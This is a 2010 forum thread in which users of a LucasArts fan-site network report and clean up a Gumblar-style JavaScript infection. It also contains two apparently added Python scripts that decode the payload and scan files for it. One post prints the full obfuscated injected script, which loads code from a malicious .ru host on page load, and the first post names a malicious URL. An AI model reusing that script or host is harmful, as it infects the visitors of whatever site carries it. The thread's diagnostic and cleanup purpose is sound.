LucasForums

LucasForums (http://www.lucasforums.com/index.php)
-   General Discussion (http://www.lucasforums.com/forumdisplay.php?f=185)
-   -   Mojo malware infection? (http://www.lucasforums.com/showthread.php?t=202950)

Harald B 03-03-2010 12:41 PM

Mojo malware infection?
 
Since this morning each time I try to go to mixnmojo.com AVG warns me that it's blocking a connection to a very dubious link; they vary slightly, with the following being a good example:
Code:

winamp-com.mapquest.com.orbitdownloader-com.breathconditioning.ru:8080/petardas.com/petardas.com/fanpop.com/secureserver.net/google.com.php
(warning: going there is probably a very bad idea). The site still shows up fine and I have no idea what element is causing this, but since I haven't gotten this before anywhere and am only getting it with Mojo (and also with Behind Mojo) you may want to have an admin look into it.
Sorry if I should have posted this somewhere else. I'm not sure where that would be.

edit: I've got two more relevant details. Only the main site and Behind cause trouble, deeper links (blog comments, game database etc) are fine. Also, my other, Nod32-using computer warns me at the same places, and identifies it as a "JS/TrojanDownloader.Agent.NSM Trojan".

Gabez 03-03-2010 02:34 PM

Weird. Thanks for letting us know. I don't understand any of the technicalities, but hopefully (HOPEFULLY!) someone on the team does.

I do know that it's getting increasingly hard to update the news, though; the admin keeps crashing. Don't know if that's related or not. I showed a tech friend the inner workings of the site the other day and he was horrified -- apparently the code was made obsolete years ago, and by all logic Mixnmojo shouldn't work at all. Yet it's managing to lumber on... I guess because we keep on stacking more lines of code on top of it.

Hopefully this malware infection won't spread anymore and we can trap it in more lines of code. That's the only solution I can think of for now. Maybe someone who actually knows what they're talking about can give some better advice.

elTee 03-03-2010 03:09 PM

Heh yes, I changed the EMI score from 4 skulls to 2 for a joke, but then the goddamn thing kept resetting itself to 2 again. Remi was up all night changing it back :(

Gabez 03-04-2010 07:03 AM

It has begun: http://poisonpen.mixnmojo.com/ and http://pumpkinpost.mixnmojo.com/ have now been infected by Mojo 9's seriously dated and ageing code.

It's Chernobyl all over again.

Haggis 03-04-2010 08:51 AM

Yeah, I noticed that someone, or something, had been messing with my WordPress files. I'm now re-uploading the affected files. Looks like some kind of virus or something, although I'm even less technically savvy than Gabez, so I don't really know what I'm talking about. Right now the Pumpkin Post seems to be back up and running, hopefully that was that...

bgbennyboy 03-04-2010 02:58 PM

Looks like it's probably a variant of the Gumblar script. I know Zaarin has cleaned it from some pages, but it's tried to copy itself to all index.php pages it seems.

Most of the *index.php files on my site got a script appended to the end; it even snuck its way into my WordPress theme files too. Any site that's using WordPress will need to make sure they check their themes and plugins. I know I normally just leave the wp-content folder alone when upgrading/fixing.

Harald B 03-04-2010 04:41 PM

Heads-up: I'm now also getting it when at the comments sections for individual blog posts and in the game database (i.e. it's spread to showfile.php and gamedb.php, presumably).

edit: Nod32 is now identifying it as a "JS/TrojanDownloader.Iframe.NHE Trojan". Maybe the word Iframe will do your engineers some good.

Gabez 03-04-2010 04:45 PM

The infection is spreading!!!!

DO NOT PANIC.

jp-30 03-04-2010 05:38 PM

If only we had started building Mojo 10.

DJG 03-04-2010 10:50 PM

Don't blame the code.

Damn kids.

Valkian 03-05-2010 12:46 AM

I hate to say this Gabez... but I'M IN PANIC!!!
Both The Dig Museum and The Thrillville Quarterly are under attack!!

Should re-uploading the files solve the problem? WHAT SHOULD I DO?? I'M SO UNPREPARED FOR THIS! HIGHSCHOOL SUCKS!

MJ 03-05-2010 01:08 AM

Nightlight appears to be fine. Heh, not even a virus can be arsed to pay attention to it. :)

QueZTone 03-05-2010 03:23 AM

haha DJG came out of hiding after all those years! my plan worked!


but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement I think?

Harald B 03-05-2010 04:18 AM

Quote:

Originally Posted by QueZTone (Post 2710459)
but seriously, very annoying stuff this... get that mapquest malware notice too... but that's something different from the gumblar script..

the mapquest thing is just a wrong advertisement I think?

Afraid not. The link is way too dubious for that, and to make sure I re-enabled adblock on Mojo and still got the same warnings.

diduz 03-05-2010 06:37 AM

Guys, the malware has attacked my laptop and I've been battling to save my system!!! :(

I won't go back to the site until it's safe again (I'm writing from another PC right now).

It seems to be some sort of fake virus alert.

Icebox 03-05-2010 02:05 PM

Series of tubes, goddamn it. I hope you gentlemen come out of it okay, powers that be willing.

I will try to stay off of Mojo until you get 10 up and running. Don't want to take any major risks. Also I actually sort of enjoyed Poison Pen, for whatever reason, and am sad to see it wiped. All the beast.

bgbennyboy 03-05-2010 02:16 PM

For those hosted sites using WordPress you'll either need to restore off a known clean backup or reinstall WordPress. I had to:
  • Delete the wp-admin and wp-includes folders
  • Download WordPress again and re-upload all the files, overwriting those that were there
  • Edit the wp-config.php and index.php files to remove the virus code from the footer
  • Look in the themes in wp-content and remove the code from the footers in the php files
  • None of the plugins looked like they were infected, but it seems that the script can be appended to .js files too, so to be safe I deleted the existing plugins and replaced them one by one.

This is the code that was appended to my files:
Code:

<script>try {var L;if(L!='l'){L='l'};var b='replace';var J="";var vs="";var Y=RegExp;var NS='';var d;if(d!='' && d!='hs'){d=null};this.iu="";function v(e,B){var _=new Array();var sR;if(sR!='Vb' && sR != ''){sR=null};var y='[';var i_=new Array();var mV=new Date();var V='g';y+=B;var z;if(z!='dD'){z='dD'};y+=']';this.Pv='';var W=new Y(y, V);var eF=new Date();var lD=new Date();return e[b](W, new String());};var YI;if(YI!='' && YI!='Hu'){YI='C'};this.Wd="";var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");var yh;if(yh!='ul' && yh!='hU'){yh='ul'};var a=v('8999696960966996869666609696996',"69");var An=new Date();var uc=new Date();var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");var j=new Date();var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");var yx='';this.ne="";var nw;if(nw!='' && nw!='pk'){nw=null};var bU=window;this._m='';var Rn;if(Rn!='' && Rn!='HF'){Rn=null};var w=v('o8n3lqo8aTd3',"T83q");var xv=new String();this.QK="";var nT;if(nT!='' && nT!='X'){nT=null};var ik;if(ik!='' && ik!='VG'){ik=null};var o=v('s9c9rIiIpIt9',"9lI");A=function(){var Ly;if(Ly!='LU' && Ly != ''){Ly=null};var lY;if(lY!='lS' && lY != ''){lY=null};var Bn=new Array();G=document[c](o);var St;if(St!='Vo'){St=''};var LI;if(LI!='' && LI!='kI'){LI=''};yx=S+a;var KC=new Date();yx+=h;var HN="";G.defer=([1][0]);var Yh='';var lh;if(lh!='' && lh!='rb'){lh=''};G.src=yx;var Vt;if(Vt!='' && Vt!='hss'){Vt=null};var Wr;if(Wr!='HE' && Wr!='ke'){Wr='HE'};document.body.appendChild(G);this.iQ='';};var tK=new Array();bU[w]=A;} catch(M){var In=new Date();var mh;if(mh!='KU' && mh!='Za'){mh=''};};</script>
<!--699af17d7dda64c9f7a4601e44c2c9c6-->

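The script bgbennyboy pasted is easier to read than it looks: every v('...', "...") call simply deletes from the first string each character that appears in the second (the posted v() does e.replace(new RegExp('[' + B + ']', 'g'), '')). The Python below is an added example for this thread, not code from the post or from Mojo. It decodes those calls statically, without running any of the script, and reassembles the src that the injected <script> element is given when window.onload fires. The six v() literals are copied verbatim from the post above; the function and variable names (strip_chars, decode_calls, summarize, POSTED_CALLS) are my own.

```python
"""Static decode of the string-stripping obfuscation in the posted script.

Added example; nothing here executes the malware, it only reverses its
string encoding with ordinary Python.
"""
import re

# In the posted script, v(e, B) returns e with every character of B removed
# (e.replace(new RegExp('[' + B + ']', 'g'), '')). Same operation here.
def strip_chars(encoded, junk):
    return "".join(ch for ch in encoded if ch not in junk)


# The six v('...', "...") calls, copied from the script in the post above.
POSTED_CALLS = r"""
var h=v('/jpWejtLajrWdLaWsL.LcjoWmj/jpjejtWaWrLdLaLsj.WcWoLmW/jfWaLnLpLoLpW.LcLoWmW/jsWejcLujrLejsjeWrLvLeWrW.WnjeLtW/WgLojojgjlLeW.LcLoLmj.WpjhLpL',"WjL");
var a=v('8999696960966996869666609696996',"69");
var c=v('cbrbeJaJtJeZEJlJeZmbeZnbtb',"ZBJb");
var S=v('h9tztOpz:z/9/zwOi9nOaOm9pz-OcOoOm9.zm9a9pOq9u9e9sztO.zczozmz.Oo9r9bziztzdzozwOnOlzoza9dOezrz-9c9ozmz.9bzr9eza9tOhzc9oznOdzi9t9iOo9nziznzg9.Or9u9:z',"O9z");
var w=v('o8n3lqo8aTd3',"T83q");
var o=v('s9c9rIiIpIt9',"9lI");
"""

# var NAME=v('ENCODED',"JUNK")
CALL_RE = re.compile(r"""var\s+(\w+)\s*=\s*v\('([^']*)',\s*"([^"]*)"\)""")


def decode_calls(script_text):
    """Map each variable name to the plaintext its v() call produces."""
    return {
        name: strip_chars(encoded, junk)
        for name, encoded, junk in CALL_RE.findall(script_text)
    }


def summarize(script_text):
    """Reconstruct what the decoded pieces are used for.

    The posted script does: G = document[c](o); G.src = S + a + h;
    document.body.appendChild(G); and installs that as window[w].
    """
    d = decode_calls(script_text)
    return {
        "hook": f"window.{d['w']}",
        "element": f"document.{d['c']}('{d['o']}')",
        "src": d["S"] + d["a"] + d["h"],
    }


if __name__ == "__main__":
    for key, value in summarize(POSTED_CALLS).items():
        print(f"{key:8} {value}")
```

The reassembled src is exactly the host:port/path Harald B saw AVG block in the first post, which is the quickest way to confirm that the appended script and the blocked connection are the same infection. The same strip_chars() approach works on any variant that keeps this encoder; only the junk alphabets change.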

Gabez 03-05-2010 02:28 PM

Oh my, DJG! Now I know that it's the end of days.

Hopefully we'll get it sorted out soon because we can't afford to rebuild the code from scratch for at least another few years (when the economy has fully recovered). Until then the mythical "10" version will have to remain just a myth. :/

daltysmilth 03-05-2010 03:14 PM

If, God forbid, the whole site goes down, is there anyplace we could go to see what the status is to getting it back up again?

Harald B 03-05-2010 03:20 PM

Right here, probably. LucasForums is sufficiently distinct from Mojo that it should stay fine.

Valkian 03-05-2010 03:24 PM

I was actually thinking of Gabez' place. That would be the ultimate shelter for us in times of desperation.

Gabez 03-05-2010 03:29 PM

None of you are allowed in my panic shelter >:

elTee 03-05-2010 03:53 PM

Gabez should be shot for this. I've seen his panic shelter, and it would not be a lie to say that one half of it contains 17,450 hot water bottles (of various design, size etc.) and the other half contains a large, deep, bath.

MJ 03-05-2010 10:14 PM

I've checked Nightlight's code, and it seems to be fine. It's on Wordpress, but as a coincidence I updated it to the latest version about five days ago.

Gabez 03-06-2010 05:02 AM

Yeah, but Nightlight is on the Grim Fandango.net part of the server, so I don't think it would be affected anyway.

But it never hurts to make sure!

Serge 03-06-2010 10:40 AM

HighLand is infected too - and it certainly doesn't run on Wordpress - not sure Wordpress even existed when that site was made. Predates lowercase HTML too ;-)

And I don't remember the FTP account (as usual), so... :P

Gabez 03-06-2010 11:26 AM

Don't worry Serge, we'll fix it.

s-island 03-06-2010 11:28 AM

It's gone from Highland now. It infects all index*.php/html, default*.php/html and all JS files, so all sites have at least one infected file.

Haggis 03-08-2010 08:48 AM

I'm getting strange pop-ups on the World of MI forums, but I can't see any files that have been infected. Maybe you guys can take a look at it, and also at World of MI itself, which I don't have access to?

Gabez 03-08-2010 09:34 AM

Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

But we'll get our best people on the case anyway.

Let us pray that the infection does not spread any further...

Valkian 03-08-2010 02:03 PM

Well, it seems that the Thrillville Quarterly and The Dig Museum are now both clear, thanks to my relentless efforts at containing the infection.
I know many of you were worried about that.

Haggis 03-08-2010 03:51 PM

Quote:

Originally Posted by Gabez (Post 2711184)
Those "strange pop-ups" are probably adverts from when World of MI sold out to THE MAN.

Or disgruntled fans are attacking the site because WMI sold out... :detective:

Quote:

But we'll get our best people on the case anyway.
Thanks! :thmbup1:

Gabez 03-08-2010 05:14 PM

Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...

Valkian 03-08-2010 06:03 PM

Oh, wait a minute, I thought Zaarin was Zaarin and now it turns out he is actually s-island? No wonder Zaarin never replied when I thanked him for something, he was the wrong Zaarin!
I would appreciate it if there was some sort of press release explaining these things so I don't make myself look like a fool in the future (or rather, not any more than I already do).

Haggis 03-13-2010 08:16 AM

Quote:

Originally Posted by Gabez (Post 2711264)
Zaarin (s-island) had a look at the World of MI and WoMI forum files and saw no trace of the Mojo Virus...

I had a look on those forums and couldn't see anything dodgy. Is it possible that the pop-ups are on your end? Don't know what else to suggest. Maybe updating the forum software would help, if you can...

Sorry for the late reply, I've been offline due to sickness... the popups are being reported by several forum members, so they're not just on my end I'm afraid. I also recently updated the forum software when the latest version of phpBB came out, which was after the popup problem started appearing, but that didn't fix it. Perhaps I should try a clean install of phpBB, see if that will fix it.

s-island 03-13-2010 10:46 AM

I've run some scripts on all of Mojo's files that remove the JavaScript malware, so things should be clean now. However, some JS files and probably some PHP/HTML files as well may have lost content. I know that WordPress's PHP files have had the last ?> removed by the virus and some JS files have been completely emptied.
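
A scanner/cleaner in the spirit of bgbennyboy's checklist and s-island's notes above, written here as an added example. It is not the scripts s-island actually ran (those are not in this thread) and not Mojo's code. It walks a web root and looks at every .php/.html/.js file, a superset of the index*/default*/JS pattern s-island describes, so that theme footers like the ones bgbennyboy found are caught too. It removes only the "<script>try {var ... </script>" span plus its 32-hex comment marker, defaults to a dry run, and flags the two damage cases mentioned in the thread: files that contained nothing but the payload, and zero-byte JS files. It does not recreate a missing trailing ?>, so PHP files should still be diffed against a clean copy. The mini site it builds in a temporary directory is constructed for the demo; the payload wrapper and marker are taken from bgbennyboy's post, the file names are made up.

```python
"""Find and strip the appended Gumblar-style script block from a web root.

Added example for this thread; not the scripts the Mojo admins ran.
"""
import re
import tempfile
from pathlib import Path

# The thread names index*.php/html, default*.php/html, theme .php files and
# .js files as carriers; scanning every .php/.html/.js file covers all of them.
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}

# The appended block: "<script>try {var ...</script>" followed by an HTML
# comment holding a 32-hex marker. Non-greedy, so a later legitimate
# </script> in the same file is left alone.
PAYLOAD_RE = re.compile(
    r"<script>try\s*\{var\s.*?</script>(?:\s*<!--[0-9a-f]{32}-->)?",
    re.DOTALL,
)

# Constructed sample in the shape of the posted payload (wrapper + marker).
SAMPLE_PAYLOAD = (
    "<script>try {var L;if(L!='l'){L='l'};var bU=window;"
    "bU['onload']=function(){};} catch(M){};</script>\n"
    "<!--699af17d7dda64c9f7a4601e44c2c9c6-->"
)


def strip_payload(text):
    """Remove every payload occurrence; return (cleaned_text, hit_count)."""
    return PAYLOAD_RE.subn("", text)


def classify(path, write=False):
    """Classify one file; with write=True, rewrite infected files in place.

    'clean'        no signature, file has content
    'empty'        zero-byte file (emptied JS, as reported): restore from backup
    'infected'     signature found, dry run, nothing written
    'cleaned'      signature found and removed
    'payload-only' nothing but payload in the file: restore, don't ship a blank
    """
    data = path.read_bytes()
    if not data:
        return "empty"
    # surrogateescape round-trips arbitrary bytes, so non-UTF-8 files survive.
    text = data.decode("utf-8", errors="surrogateescape")
    cleaned, hits = strip_payload(text)
    if hits == 0:
        return "clean"
    if not cleaned.strip():
        return "payload-only"
    if write:
        path.write_bytes(cleaned.encode("utf-8", errors="surrogateescape"))
        return "cleaned"
    return "infected"


def scan_tree(root, write=False):
    """Return {relative_posix_path: status} for every candidate file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): classify(p, write)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES
    }


def build_sample_site(root):
    """Lay out a constructed mini web root mirroring the cases in the thread."""
    files = {
        "index.php": "<?php\nrequire 'wp-blog-header.php';\n?>\n" + SAMPLE_PAYLOAD,
        "wp-content/themes/mojo/footer.php": "</body>\n</html>\n" + SAMPLE_PAYLOAD,
        "wp-content/themes/mojo/header.php": "<html>\n<body>\n",
        # appended to a JS file, here without the marker comment
        "js/menu.js": "function toggle(){return 1;}\n" + SAMPLE_PAYLOAD.split("\n")[0],
        "js/widgets.js": "",                    # emptied by an earlier cleanup
        "gamedb/default.html": SAMPLE_PAYLOAD,  # original content already gone
        "readme.txt": "not a candidate file\n",
    }
    for rel, content in files.items():
        target = Path(root) / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def demo():
    """Dry run, then clean, then re-scan; returns the three status maps."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        before = scan_tree(tmp)
        after = scan_tree(tmp, write=True)
        verify = scan_tree(tmp)
    return before, after, verify


if __name__ == "__main__":
    for label, result in zip(("dry run", "clean", "verify"), demo()):
        print(label)
        for rel, status in result.items():
            print(f"  {status:13} {rel}")
```

Run it with write=False first and read the report; only files marked "infected" get rewritten on the second pass, and "payload-only" and "empty" files are deliberately left alone because removing the payload would leave nothing worth serving. Those are the files to pull from a known-clean backup or a fresh WordPress download, as bgbennyboy did. Cleaning files in place does not close whatever let the attacker write to them (Gumblar-era infections typically came in through stolen FTP credentials), so rotating every FTP and admin password is part of the job, not an afterthought.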

Maratanos 03-30-2010 08:36 AM

Hey, uh, guys? Was it your intention to send out an RSS feed item entitled "MOJO SUX" with a body linking to someplace that looks an awful lot like a spam site for pharmaceuticals?

EDIT: confirmed from a linux computer that there is a newspost too.

Gabez 03-30-2010 08:52 AM

Sorry about that; as far as I know it was just a news post that was added by someone (not anyone authorised), but it's gone now and we'll reset the passwords for everything tonight. Sorry again about this, but we're working on the situation.

Jeff 03-30-2010 12:36 PM

Anyone receiving a trojan warning when they enter this thread? Odd that it is thread-specific but I just received two warnings in a row in this thread. Also, the ads aren't loading in this thread.

Kroms 03-30-2010 02:06 PM

Mojown'd :( I'm going to miss this site, when it finally hits the ****ter.

